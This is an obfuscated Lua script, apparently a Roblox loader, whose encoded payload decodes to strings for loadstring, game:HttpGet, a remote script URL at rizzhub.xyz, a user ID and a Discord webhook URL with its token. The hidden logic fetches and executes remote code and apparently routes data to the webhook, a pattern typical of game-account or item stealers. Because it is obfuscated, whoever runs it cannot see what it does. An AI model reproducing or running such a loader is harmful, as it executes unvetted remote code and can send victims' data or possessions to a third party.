
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=0 + 0 ;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v31==((517 -(198 + 318)) + 1)) then v36=v21(v33,14 + 6 + 1 ,31);v37=((v21(v33,(2 + 92) -62 )==(1 + 0)) and  -(3 -2)) or (1 + 0) ;v31=796 -(625 + 168) ;end if ((1107 -(542 + 565))==v31) then v32=v24();v33=v24();v31=(5 -3) -1 ;end if ((4 -3)==v31) then v34=1397 -(450 + 946) ;v35=(v21(v33,2 -1 ,59 -39 ) * ((1 + (1 -0))^(17 + 15))) + v32 ;v31=7 -5 ;end if (v31==(502 -(150 + 349))) then if (v36==(668 -(514 + 154))) then if (v35==((848 -(492 + 308)) -(41 + 6 + 1))) then return v37 * (0 -0) ;else v36=1 -0 ;v34=(0 + 0) -0 ;end elseif (v36==(9664 -7617)) then return ((v35==(0 -0)) and (v37 * ((762 -(128 + 48 + 585))/0))) or (v37 * NaN) ;end return v8(v37,v36-(4082 -3059) ) * (v34 + (v35/((1 + 1)^(1251 -(511 + 688))))) ;end end end v26=nil;function v26(v38)local v39=0 + (919 -(418 + 501)) ;local v40;local v41;while true do if (v39==(987 -(80 + 907))) then v40=nil;if  not v38 then local v82=0 -0 ;while true do if ((1233 -(834 + 399))==v82) then v38=v24();if (v38==(0 + (171 -(119 + 52)))) then return "";end break;end end end v39=(1058 -644) -(224 + 189) ;end if (v39==(1290 -(333 + 955))) then v41={};for v78=952 -(784 + 167) , #v40 do v41[v78]=v2(v1(v3(v40,v78,v78)));end v39=1 + (1749 -(1586 + 161)) ;end if (v39==1) then v40=v3(v16,v19,(v19 + v38) -1 );v19=v19 + v38 ;v39=6 -4 ;end if ((3 + 0)==v39) then return v6(v41);end end end v18=5;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v42)if (v1(v42,2)==79) then v20=v0(v3(v42,1,1));return "";else local v74=v2(v0(v42,16));if v20 then local v80=v5(v74,v20);v20=nil;return v80;else return v74;end end end);v18=1;end if (v18==7) then function v30(v43,v44,v45)local v46=v43[1];local v47=v43[2];local v48=v43[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==3) then A,B=v28(v11(v73));if  not A[1] then local v93=v43[4][v69] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==1) then v71={...};v72=v12("#",...) -1 ;v68=2;end if (v68==2) then v73=nil;function v73()local v83=v46;local v84=v47;local v85=v48;local v86=v28;local v87={};local v88={};local v89={};for v94=0 + 0 ,v72 do if ((((9061 -4336) -2989)<=(8609 -4500)) and (v94>=v85)) then v87[v94-v85 ]=v71[v94 + 1 + 0 ];else v89[v94]=v71[v94 + 1 ];end end local v90=(v72-v85) + 1 + 0 ;local v91;local v92;while true do local v95=0;local v96;local v97;while true do if (((611 -(95 + 187))<(4595 -(263 + 214))) and (v95==0)) then v96=(2756 -1643) -(88 + 395 + 630) ;v97=nil;v95=192 -(94 + 97) ;end if (((2902 + 1941)==4843) and (v95==1)) then while true do if ((v96==0) or (1141==2311)) then v97=0 -0 ;while true do if ((v97==(0 + 0)) or (3626==((9577 -4208) -(224 + 1096)))) then local v121=1143 -((2506 -1892) + 529) ;local v122;while true do if ((v121==(709 -(5 + 704))) or (2123<=(1779 -837))) then v122=0 -(1089 -(64 + 1025)) ;while true do if ((v122==((0 -0) + (0 -0))) or (((12417 -7507) -(523 + 219))<(3573 -(380 + 228)))) then local v124=0 -0 ;while true do if (((4977 -(54 + 16))>=(127 + 168)) and (v124==(1972 -(650 + 1321)))) then v122=(1 -0) + 0 ;break;end if ((v124==(772 -(484 + 288))) or ((6072 -4187)>(1283 + 1621))) then v91=v83[v69];v92=v91[1];v124=177 -(57 + 69 + 50) ;end end end if ((v122==((2 -1) + 0)) or ((2298 + 835)<=(4192 -(1031 + 519)))) then v97=1 + 0 ;break;end end break;end end end if (((5707 -2165)>(1818 -663)) and (v97==(631 -(502 + 128)))) then if (((6609 -3874)>=(1122 -851)) and (v92<=(1 + 3))) then if (((4772 -(540 + 934))==(6864 -3566)) and (v92<=1)) then if ((v92==(615 -(64 + 551))) or (1348>=(4463 -(339 + 499)))) then local v125=0 + 0 ;local v126;local v127;local v128;while true do if ((v125==(1 + 0)) or ((5170 -((869 -514) + 304))<=(4142 -2467))) then v128=nil;while true do if (((597 + 509)<=3383) and (v126==((0 -0) -0))) then v127=v91[2];v128=v89[v91[13 -10 ]];v126=1 -0 ;end if ((1==v126) or ((5799 -(332 + 696))<=(1231 -868))) then v89[v127 + ((535 + 1441) -(1828 + 147)) ]=v128;v89[v127]=v128[v91[1058 -(194 + 860) ]];break;end end break;end if (((3970 -(205 + 328))>(2928 -(95 + 157))) and ((1799 -(1033 + (1313 -547)))==v125)) then v126=0;v127=nil;v125=1 + 0 ;end end else v89[v91[(1 + 2) -(1 -0) ]]=v45[v91[11 -8 ]];end elseif ((v92<=(886 -(566 + 318))) or ((2149 -(256 + 799))<(299 + 446))) then v89[v91[2 -(0 -0) ]][v91[3]]=v91[4];elseif (((372 + 796)<(11132 -6396)) and (v92>(1 + 2))) then local v143=0;local v144;local v145;local v146;local v147;local v148;while true do if ((v143==(1859 -(1357 + 502))) or ((1479 -444)>(2556 -(486 + 429)))) then v144=0 -0 ;v145=nil;v143=2 -1 ;end if (((554 + 2768)>=((11840 -(388 + 110)) -8417)) and (v143==(27 -(11 + 14)))) then v148=nil;while true do if (((3408 -1025)>=(2289 -1233)) and (v144==((10 -6) -3))) then local v168=1397 -(1347 + 50) ;local v169;while true do if ((v168==(0 + 0)) or ((3008 -(100 + 7))==(1687 -(740 + (879 -(5 + 15)))))) then v169=0;while true do if (((4314 + 515)>(1221 + 457)) and (v169==(2 -1))) then v144=315 -(16 + (520 -(199 + 24))) ;break;end if (((4104 + (889 -(6 + 103)))>=(131 + 51 + 740)) and (0==v169)) then v70=(v147 + v145) -((3 -2) -(1875 -(1491 + 384))) ;v148=0;v169=3 -2 ;end end break;end end end if (((363 -170)<=(3664 -(271 + 82 + 673))) and (v144==(5 -3))) then for v177=v145,v70 do local v178=1833 -(894 + 939) ;local v179;while true do if (((0 + 0)==v178) or ((2133 -1145)>3005)) then v179=0 + 0 ;while true do if (((2475 + 1261)<(1681 + 3317)) and (v179==(0 + 0))) then v148=v148 + 1 + 0 ;v89[v177]=v146[v148];break;end end break;end end end break;end if ((v144==(1818 -(1408 + 410))) or (4658<=(5 + 18))) then local v170=0 + 0 ;while true do if ((v170==(0 -0)) or ((353 + 3390)>=(5079 -(819 + 404)))) then v145=v91[5 -3 ];v146,v147=v86(v89[v145](v13(v89,v145 + 1 + 0 ,v91[10 -7 ])));v170=1;end if (((522 + 1620)<((8663 -(515 + 776)) -3309)) and (v170==(1 -0))) then v144=87 -(6 + 80) ;break;end end end end break;end if ((v143==(1 + 0)) or ((4456 -(149 + 1274))<=(2426 -(67 + 466)))) then v146=nil;v147=nil;v143=1 + 1 ;end end elseif (((263 -(5 + 11))<=2455) and (v89[v91[5 -3 ]]==v91[2 + 2 ])) then v69=v69 + 1 ;else v69=v91[2 + 1 ];end elseif ((v92<=(6 + 1)) or ((4500 -2246)>=(2616 + 2333))) then if ((3881==(9857 -5976)) and (v92<=5)) then v89[v91[233 -(202 + 29) ]]();elseif ((v92>((1151 -(947 + 191)) -7)) or ((1641 -(271 + 135))>=1449)) then v89[v91[862 -(693 + 167) ]]=v91[1 + 2 ];else v69=v91[(341 -(174 + 161)) -3 ];end elseif (((16355 -(5372 + 6705))<4390) and (v92<=(6 + 2))) then local v133=(4532 -3220) -(36 + 1276) ;local v134;while true do if ((v133==(0 -0)) or ((4367 -(179 + (136 -94)))>(4342 -(49 + 6)))) then v134=v91[1 + 1 ];v89[v134]=v89[v134](v13(v89,v134 + (3 -(2 + 0)) ,v70));break;end end elseif ((v92>9) or ((1183 + 995)>=(1570 + 3193))) then do return;end else v89[v91[2 -0 ]]=v91[1192 -(263 + 926) ]~=(0 + 0) ;end v69=v69 + (1249 -(1025 + 223)) ;break;end end break;end end break;end end end end v68=3;end end end;end return v30(v29(),{},v17)(...);end if (v18==2) then function v22()local v49=v1(v16,v19,v19);v19=v19 + 1 ;return v49;end v23=nil;function v23()local v50,v51=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 ;return (v51 * (83 + 173)) + v50 ;end v18=3;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v52,v53,v54)if v54 then local v75=0;local v76;while true do if (0==v75) then v76=(v52/(((378 + 162) -(145 + 393))^(v53-1)))%((4 -(3 -1))^(((v54-(1 + 0)) -(v53-(1980 -(394 + 1585)))) + 1 + 0)) ;return v76-(v76%(1390 -(984 + 405))) ;end end else local v77=(6 -(4 -0))^(v53-(268 -(238 + 29))) ;return (((v52%(v77 + v77))>=v77) and ((1 -0) + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v55=581 -(496 + 85) ;local v56;local v57;local v58;local v59;while true do if (v55==(0 + 0)) then v56,v57,v58,v59=v1(v16,v19,v19 + (5 -2) );v19=v19 + (54 -((126 -88) + 12)) ;v55=(944 -(28 + 915)) + 0 ;end if (v55==(1 + 0)) then return (v59 * (16778436 -(144 + 1076))) + (v58 * (66207 -(442 + 229))) + (v57 * (1071 -(449 + 366))) + v56 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v60=0;local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v60~=0) then else v61=0;v62=nil;v60=1254 -(45 + 1208) ;end if (v60==1) then v63=nil;v64=nil;v60=2;end if (v60==2) then v65=nil;v66=nil;v60=3;end if (v60==(8 -5)) then v67=nil;while true do local v81=545 -(121 + 424) ;while true do if (v81==1) then if (v61==0) then local v103=0;local v104;while true do if (v103~=(0 + 0)) then else v104=1300 -(1240 + 60) ;while true do if (v104==(0 + 0)) then v62={};v63={};v104=1;end if (v104==(1716 -(589 + 1126))) then v64={};v61=943 -(459 + 483) ;break;end end break;end end end if (v61~=(5 -3)) then else local v105=0;while true do if (0==v105) then for v107=2 -1 ,v66 do local v108=341 -(96 + 245) ;local v109;local v110;local v111;local v112;while true do if (v108==2) then while true do if (v109==0) then v110=0;v111=nil;v109=59 -(27 + 31) ;end if (1~=v109) then else v112=nil;while true do if (v110==0) then local v140=0;local v141;while true do if (v140~=0) then else v141=0;while true do if (v141==0) then local v167=0 + 0 ;while true do if (v167==(1084 -(880 + 203))) then v141=1;break;end if (v167==0) then v111=v22();v112=nil;v167=748 -(148 + 599) ;end end end if (1~=v141) then else v110=1;break;end end break;end end end if (1~=v110) then else if (v111==1) then v112=v22()~=(0 + 0) ;elseif (v111==2) then v112=v25();elseif (v111==(1 + 2)) then v112=v26();end v67[v107]=v112;break;end end break;end end break;end if ((1087 -(517 + 569))~=v108) then else v111=nil;v112=nil;v108=2 -0 ;end if (v108~=0) then else v109=890 -(805 + 85) ;v110=nil;v108=1 -0 ;end end end v65[9 -6 ]=v22();v105=1;end if (v105~=1) then else for v113=958 -(306 + 651) ,v24() do local v114=0;local v115;local v116;while true do if (v114~=(1 + 0)) then else while true do if (v115==(0 + 0)) then v116=v22();if (v21(v116,1,1)~=0) then else local v135=0 + 0 ;local v136;local v137;local v138;local v139;while true do if (v135~=(5 -3)) then else while true do if (v136==2) then if (v21(v138,471 -(313 + 157) ,1234 -(445 + 788) )==(896 -(52 + 843))) then v139[689 -(308 + 379) ]=v67[v139[2]];end if (v21(v138,2,2 + 0 )~=(4 -3)) then else v139[3 + 0 ]=v67[v139[186 -(122 + 61) ]];end v136=1344 -(1292 + 49) ;end if (v136==(0 + 0)) then local v163=0 -0 ;while true do if (1==v163) then v136=1;break;end if (v163~=(0 + 0)) then else v137=v21(v116,1 + 1 ,3 + 0 );v138=v21(v116,4,1799 -(1702 + 91) );v163=1;end end end if (1~=v136) then else local v164=0 + 0 ;local v165;while true do if (v164==(0 + 0)) then v165=0;while true do if (v165~=(0 -0)) then else v139={v23(),v23(),nil,nil};if (v137==(0 + 0)) then local v181=0;while true do if (v181==0) then v139[3 + 0 ]=v23();v139[4]=v23();break;end end elseif (v137==1) then v139[3]=v24();elseif (v137==2) then v139[3]=v24() -((1 + 1)^16) ;elseif (v137~=3) then else local v188=0 + 0 ;local v189;while true do if (0~=v188) then else v189=496 -(376 + 120) ;while true do if (v189~=0) then else v139[11 -8 ]=v24() -((1 + 1)^(22 -6)) ;v139[4 + 0 ]=v23();break;end end break;end end end v165=1;end if ((3 -2)==v165) then v136=1192 -(1030 + 160) ;break;end end break;end end end if ((3 + 0)~=v136) then else if (v21(v138,1 + 2 ,3)~=1) then else v139[9 -5 ]=v67[v139[4]];end v62[v113]=v139;break;end end break;end if ((2 -1)==v135) then v138=nil;v139=nil;v135=2;end if (v135~=(0 -0)) then else v136=0 + 0 ;v137=nil;v135=838 -(652 + 185) ;end end end break;end end break;end if (v114==(0 -0)) then local v123=0 -0 ;while true do if ((1412 -(1090 + 321))~=v123) then else v114=2 -1 ;break;end if ((0 -0)==v123) then v115=0 -0 ;v116=nil;v123=1015 -(916 + 98) ;end end end end end v61=1206 -(604 + 599) ;break;end end end break;end if (v81~=(1486 -(310 + 1176))) then else local v98=0 -0 ;while true do if (0==v98) then if (v61~=(1639 -(1264 + 374))) then else v65={v62,v63,nil,v64};v66=v24();v67={};v61=671 -(664 + 5) ;end if (v61~=(842 -(555 + 284))) then else for v117=1 + 0 ,v24() do v63[v117-(1 -0) ]=v29();end for v119=1,v24() do v64[v119]=v24();end return v65;end v98=2 -1 ;end if (v98~=(2 -1)) then else v81=2 -1 ;break;end end end end end break;end end end v30=nil;v18=7;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403263O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F5363726970742E6C756103023O005F4703063O00557365724944022O0060409405E74103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303936393238393037382O363934333439382F6A526171564A414B5A6E5645396F6E3655525854624438466632707453316D67426B39746D4C593745685F355A574B66596D335A7245356353586E4D5F7132432O45377900153O0012073O00013O0026033O000C000100020004063O000C0001001201000100033O001201000200043O00202O000200020005001207000400064O0009000500014O0004000200054O000800013O00022O00050001000100010004063O001400010026033O0001000100010004063O00010001001201000100073O003002000100080009001201000100073O0030020001000A000B0012073O00023O0004063O000100012O000A3O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
